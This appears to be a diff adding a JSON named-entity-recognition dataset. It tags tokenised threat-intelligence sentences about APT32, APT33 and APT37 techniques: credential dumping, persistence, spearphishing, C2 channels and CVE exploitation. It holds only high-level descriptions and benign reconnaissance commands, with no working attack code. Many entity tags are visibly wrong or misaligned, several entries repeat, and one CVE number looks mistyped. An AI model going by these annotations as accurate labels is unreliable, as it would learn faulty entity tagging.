"B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "An", + "APT32", + "backdoor", + "can", + "use", + "HTTP", + "over", + "a", + "non-standard", + "TCP", + "port", + "(e.g", + "14146)", + "which", + "is", + "specified", + "in", + "the", + "backdoor", + "configuration." + ], + "ner_tags": [ + "O", + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT32", + "used", + "GetPassword_x64", + "to", + "harvest", + "credentials." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT32", + "have", + "replaced", + "Microsoft", + "Outlook's", + "VbaProject.OTM", + "file", + "to", + "install", + "a", + "backdoor", + "macro", + "for", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT32", + "has", + "used", + "pass", + "the", + "hash", + "for", + "lateral", + "movement." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT32", + "successfully", + "gained", + "remote", + "access", + "by", + "using", + "pass", + "the", + "ticket." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-OffAct", + "I-OffAct", + "O", + "B-Way", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "APT32", + "has", + "used", + "PowerShell-based", + "tools,", + "PowerShell", + "one-liners,", + "and", + "shellcode", + "loaders", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Tool", + "B-Way", + "B-Tool", + "O", + "B-Way", + "B-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "APT32", + "malware", + "has", + "injected", + "a", + "Cobalt", + "Strike", + "beacon", + "into", + "Rundll32.exe." + ], + "ner_tags": [ + "B-Idus", + "B-Tool", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "B-Way", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "APT32", + "has", + "used", + "PubPrn.vbs", + "within", + "execution", + "scripts", + "to", + "execute", + "malware,", + "possibly", + "bypassing", + "defenses." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT32's", + "backdoor", + "can", + "query", + "the", + "Windows", + "Registry", + "to", + "gather", + "system", + "information." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT32", + "established", + "persistence", + "using", + "Registry", + "Run", + "keys,", + "both", + "to", + "execute", + "PowerShell", + "and", + "VBS", + "scripts", + "as", + "well", + "as", + "to", + "execute", + "their", + "backdoor", + "directly." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT32", + "created", + "a", + "Scheduled", + "Task/Job", + "that", + "used", + "regsvr32.exe", + "to", + "execute", + "a", + "COM", + "scriptlet", + "that", + "dynamically", + "downloaded", + "a", + "backdoor", + "and", + "injected", + "it", + "into", + "memory.", + "The", + "group", + "has", + "also", + "used", + "regsvr32", + "to", + "run", + "their", + "backdoor." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT32", + "has", + "enumerated", + "DC", + "servers", + "using", + "the", + "command", + "<code>net", + "group", + "\"Domain", + "Controllers\"", + "/domain</code>.", + "The", + "group", + "has", + "also", + "used", + "the", + "<code>ping</code>", + "command." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT32", + "has", + "moved", + "and", + "renamed", + "pubprn.vbs", + "to", + "a", + ".txt", + "file", + "to", + "avoid", + "detection." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT32", + "malware", + "has", + "used", + "rundll32.exe", + "to", + "execute", + "an", + "initial", + "infection", + "process." + ], + "ner_tags": [ + "B-Idus", + "B-Tool", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT32", + "used", + "Net", + "to", + "use", + "Windows'", + "hidden", + "network", + "shares", + "to", + "copy", + "their", + "tools", + "to", + "remote", + "machines", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT32", + "has", + "used", + "scheduled", + "tasks", + "to", + "persist", + "on", + "victim", + "systems." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT32's", + "backdoor", + "has", + "used", + "Windows", + "services", + "as", + "a", + "way", + "to", + "execute", + "its", + "malicious", + "payload." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT32", + "has", + "set", + "up", + "Facebook", + "pages", + "in", + "tandem", + "with", + "fake", + "websites." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "APT32", + "compromised", + "McAfee", + "ePO", + "to", + "move", + "laterally", + "by", + "distributing", + "malware", + "as", + "a", + "software", + "deployment", + "task." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Time", + "B-SecTeam", + "O", + "O", + "O", + "O", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT32", + "has", + "sent", + "spearphishing", + "emails", + "with", + "a", + "malicious", + "executable", + "disguised", + "as", + "a", + "document", + "or", + "spreadsheet." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT32", + "has", + "sent", + "spearphishing", + "emails", + "containing", + "malicious", + "links." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT32", + "has", + "used", + "malicious", + "links", + "to", + "direct", + "users", + "to", + "web", + "pages", + "designed", + "to", + "harvest", + "credentials." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "APT32", + "has", + "collected", + "the", + "OS", + "version", + "and", + "computer", + "name", + "from", + "victims.", + "One", + "of", + "the", + "group's", + "backdoors", + "can", + "also", + "query", + "the", + "Windows", + "Registry", + "to", + "gather", + "system", + "information,", + "and", + "another", + "macOS", + "backdoor", + "performs", + "a", + "fingerprint", + "of", + "the", + "machine", + "on", + "its", + "first", + "connection", + "to", + "the", + "C&C", + "server.", + "APT32", + "executed", + "shellcode", + "to", + "identify", + "the", + "name", + "of", + "the", + "infected", + "host." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT32", + "used", + "the", + "<code>ipconfig", + "/all</code>", + "command", + "to", + "gather", + "the", + "IP", + "address", + "from", + "the", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT32", + "used", + "the", + "<code>netstat", + "-anpo", + "tcp</code>", + "command", + "to", + "display", + "TCP", + "connections", + "on", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT32", + "collected", + "the", + "victim's", + "username", + "and", + "executed", + "the", + "<code>whoami</code>", + "command", + "on", + "the", + "victim's", + "machine.", + "APT32", + "executed", + "shellcode", + "to", + "collect", + "the", + "username", + "on", + "the", + "victim's", + "machine." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT32", + "has", + "used", + "scheduled", + "task", + "raw", + "XML", + "with", + "a", + "backdated", + "timestamp", + "of", + "June", + "2,", + "2016.", + "The", + "group", + "has", + "also", + "set", + "the", + "creation", + "time", + "of", + "the", + "files", + "dropped", + "by", + "the", + "second", + "stage", + "of", + "the", + "exploit", + "to", + "match", + "the", + "creation", + "time", + "of", + "kernel32.dll.", + "Additionally,", + "APT32", + "has", + "used", + "a", + "random", + "value", + "to", + "modify", + "the", + "timestamp", + "of", + "the", + "file", + "storing", + "the", + "clientID." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Time", + "O", + "B-Time", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT32", + "has", + "obtained", + "and", + "used", + "tools", + "such", + "as", + "Mimikatz", + "and", + "Cobalt", + "Strike,", + "and", + "a", + "variety", + "of", + "other", + "open-source", + "tools", + "from", + "GitHub." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT32", + "has", + "hosted", + "malicious", + "payloads", + "in", + "Dropbox,", + "Amazon", + "S3,", + "and", + "Google", + "Drive", + "for", + "use", + "during", + "targeting." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT32", + "has", + "used", + "macros,", + "COM", + "scriptlets,", + "and", + "VBS", + "scripts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "B-Way", + "B-Tool", + "O", + "B-Way", + "B-Tool" + ] + }, + { + "tokens": [ + "APT32", + "has", + "used", + "JavaScript", + "that", + "communicates", + "over", + "HTTP", + "or", + "HTTPS", + "to", + "attacker", + "controlled", + "domains", + "to", + "download", + "additional", + "frameworks.", + "The", + "group", + "has", + "also", + "used", + "downloaded", + "encrypted", + "payloads", + "over", + "HTTP." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "APT32", + "has", + "used", + "Dropbox,", + "Amazon", + "S3,", + "and", + "Google", + "Drive", + "to", + "host", + "malicious", + "downloads." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Tool", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT32", + "has", + "set", + "up", + "Dropbox,", + "Amazon", + "S3,", + "and", + "Google", + "Drive", + "to", + "host", + "malicious", + "downloads." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT32", + "has", + "used", + "Web", + "shells", + "to", + "maintain", + "access", + "to", + "victim", + "websites." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT32", + "has", + "used", + "cmd.exe", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "APT32", + "used", + "WMI", + "to", + "deploy", + "their", + "tools", + "on", + "remote", + "machines", + "and", + "to", + "gather", + "information", + "about", + "the", + "Outlook", + "process." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT32", + "modified", + "Windows", + "Services", + "to", + "ensure", + "PowerShell", + "scripts", + "were", + "loaded", + "on", + "the", + "system.", + "APT32", + "also", + "creates", + "a", + "Windows", + "service", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT33", + "has", + "used", + "WinRAR", + "to", + "compress", + "data", + "prior", + "to", + "exfil." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT33", + "has", + "used", + "a", + "variety", + "of", + "publicly", + "available", + "tools", + "like", + "LaZagne", + "to", + "gather", + "credentials." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "B-Way", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "APT33", + "has", + "used", + "compromised", + "Office", + "365", + "accounts", + "in", + "tandem", + "with", + "Ruler", + "in", + "an", + "attempt", + "to", + "gain", + "control", + "of", + "endpoints." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "I-Purp", + "I-Purp", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "APT33", + "has", + "used", + "a", + "variety", + "of", + "publicly", + "available", + "tools", + "like", + "LaZagne", + "to", + "gather", + "credentials." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "B-Way", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "APT33", + "has", + "used", + "a", + "variety", + "of", + "publicly", + "available", + "tools", + "like", + "LaZagne", + "to", + "gather", + "credentials." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "B-Way", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "APT33", + "has", + "used", + "a", + "variety", + "of", + "publicly", + "available", + "tools", + "like", + "LaZagne", + "to", + "gather", + "credentials." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "B-Way", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "APT33", + "has", + "used", + "base64", + "to", + "encode", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT33", + "has", + "used", + "FTP", + "to", + "exfiltrate", + "files", + "(separately", + "from", + "the", + "C2", + "channel)." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT33", + "has", + "attempted", + "to", + "exploit", + "a", + "known", + "vulnerability", + "in", + "WinRAR", + "(CVE-2018-20250),", + "and", + "attempted", + "to", + "gain", + "remote", + "code", + "execution", + "via", + "a", + "security", + "bypass", + "vulnerability", + "(CVE-2017-11774)." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "APT33", + "has", + "used", + "a", + "publicly", + "available", + "exploit", + "for", + "CVE-2017-0213", + "to", + "escalate", + "privileges", + "on", + "a", + "local", + "system." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Exp", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT33", + "has", + "used", + "a", + "variety", + "of", + "publicly", + "available", + "tools", + "like", + "Gpppassword", + "to", + "gather", + "credentials." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "B-Way", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "APT33", + "has", + "downloaded", + "additional", + "files", + "and", + "programs", + "from", + "its", + "C2", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-OffAct", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT33", + "has", + "used", + "a", + "variety", + "of", + "publicly", + "available", + "tools", + "like", + "LaZagne", + "to", + "gather", + "credentials." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "B-Way", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "APT33", + "has", + "used", + "a", + "variety", + "of", + "publicly", + "available", + "tools", + "like", + "LaZagne,", + "Mimikatz,", + "and", + "ProcDump", + "to", + "dump", + "credentials." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "B-Way", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT33", + "has", + "used", + "malicious", + "e-mail", + "attachments", + "to", + "lure", + "victims", + "into", + "executing", + "malware." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT33", + "has", + "lured", + "users", + "to", + "click", + "links", + "to", + "malicious", + "HTML", + "applications", + "delivered", + "via", + "spearphishing", + "emails." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "APT33", + "has", + "used", + "SniffPass", + "to", + "collect", + "credentials", + "by", + "sniffing", + "network", + "traffic." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "O" + ] + }, + { + "tokens": [ + "APT33", + "has", + "used", + "HTTP", + "over", + "TCP", + "ports", + "808", + "and", + "880", + "for", + "command", + "and", + "control." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT33", + "has", + "used", + "password", + "spraying", + "to", + "gain", + "access", + "to", + "target", + "systems." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "I-Purp", + "I-Purp", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT33", + "has", + "utilized", + "PowerShell", + "to", + "download", + "files", + "from", + "the", + "C2", + "server", + "and", + "run", + "various", + "scripts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT33", + "has", + "deployed", + "a", + "tool", + "known", + "as", + "DarkComet", + "to", + "the", + "Startup", + "folder", + "of", + "a", + "victim,", + "and", + "used", + "Registry", + "run", + "keys", + "to", + "gain", + "persistence." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT33", + "has", + "created", + "a", + "scheduled", + "task", + "to", + "execute", + "a", + ".vbe", + "file", + "multiple", + "times", + "a", + "day." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT33", + "has", + "sent", + "spearphishing", + "e-mails", + "with", + "archive", + "attachments." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT33", + "has", + "sent", + "spearphishing", + "emails", + "containing", + "links", + "to", + ".hta", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "B-SamFile", + "O" + ] + }, + { + "tokens": [ + "APT33", + "has", + "used", + "base64", + "to", + "encode", + "command", + "and", + "control", + "traffic." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT33", + "has", + "used", + "AES", + "for", + "encryption", + "of", + "command", + "and", + "control", + "traffic." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "O" + ] + }, + { + "tokens": [ + "APT33", + "has", + "obtained", + "and", + "leveraged", + "publicly-available", + "tools", + "for", + "early", + "intrusion", + "activities." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Purp", + "B-Org", + "B-OffAct" + ] + }, + { + "tokens": [ + "APT33", + "has", + "used", + "valid", + "accounts", + "for", + "initial", + "access", + "and", + "privilege", + "escalation." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-OffAct", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT33", + "has", + "used", + "VBScript", + "to", + "initiate", + "the", + "delivery", + "of", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT33", + "has", + "used", + "HTTP", + "for", + "command", + "and", + "control." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT33", + "has", + "attempted", + "to", + "use", + "WMI", + "event", + "subscriptions", + "to", + "establish", + "persistence", + "on", + "compromised", + "hosts." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "B-Way", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT37", + "has", + "used", + "an", + "audio", + "capturing", + "utility", + "known", + "as", + "SOUNDWAVE", + "that", + "captures", + "microphone", + "input." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "APT37", + "leverages", + "social", + "networking", + "sites", + "and", + "cloud", + "platforms", + "(AOL,", + "Twitter,", + "Yandex,", + "Mediafire,", + "pCloud,", + "Dropbox,", + "and", + "Box)", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Idus", + "I-Idus", + "I-Idus", + "O", + "O", + "O", + "O", + "B-Org", + "B-Org", + "B-Org", + "B-Org", + "B-Org", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT37", + "has", + "a", + "function", + "in", + "the", + "initial", + "dropper", + "to", + "bypass", + "Windows", + "UAC", + "in", + "order", + "to", + "execute", + "the", + "next", + "payload", + "with", + "higher", + "privileges." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT37", + "has", + "used", + "Ruby", + "scripts", + "to", + "execute", + "payloads." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT37", + "has", + "used", + "a", + "credential", + "stealer", + "known", + "as", + "ZUMKONG", + "that", + "can", + "harvest", + "usernames", + "and", + "passwords", + "stored", + "in", + "browsers." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT37", + "has", + "collected", + "data", + "from", + "victims'", + "local", + "systems." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT37", + "has", + "access", + "to", + "destructive", + "malware", + "that", + "is", + "capable", + "of", + "overwriting", + "a", + "machine's", + "Master", + "Boot", + "Record", + "(MBR)." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT37", + "has", + "used", + "strategic", + "web", + "compromises,", + "particularly", + "of", + "South", + "Korean", + "websites,", + "to", + "distribute", + "malware.", + "The", + "group", + "has", + "also", + "used", + "torrent", + "file-sharing", + "sites", + "to", + "more", + "indiscriminately", + "disseminate", + "malware", + "to", + "victims.", + "As", + "part", + "of", + "their", + "compromises,", + "the", + "group", + "has", + "used", + "a", + "Javascript", + "based", + "profiler", + "called", + "RICECURRY", + "to", + "profile", + "a", + "victim's", + "web", + "browser", + "and", + "deliver", + "malicious", + "code", + "accordingly." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Way", + "I-Way", + "O", + "O", + "O", + "I-Area", + "I-Area", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-HackOrg", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT37", + "has", + "used", + "Windows", + "DDE", + "for", + "execution", + "of", + "commands", + "and", + "a", + "malicious", + "VBS." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "B-Purp", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "APT37", + "has", + "used", + "exploits", + "for", + "Flash", + "Player", + "(CVE-2016-4117,", + "CVE-2018-4878),", + "Word", + "(CVE-2017-0199),", + "Internet", + "Explorer", + "(CVE-2020-1380", + "and", + "CVE-2020-26411),", + "and", + "Microsoft", + "Edge", + "(CVE-2021-26411)", + "for", + "execution." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "I-Tool", + "I-Tool", + "B-Features", + "B-Features", + "B-Tool", + "B-Features", + "I-Tool", + "I-Tool", + "B-Features", + "O", + "B-Features", + "O", + "I-Tool", + "I-Tool", + "B-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "APT37", + "has", + "downloaded", + "second", + "stage", + "malware", + "from", + "compromised", + "websites." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Tool", + "O" + ] + }, + { + "tokens": [ + "APT37", + "has", + "signed", + "its", + "malware", + "with", + "an", + "invalid", + "digital", + "certificates", + "listed", + "as", + "“Tencent", + "Technology", + 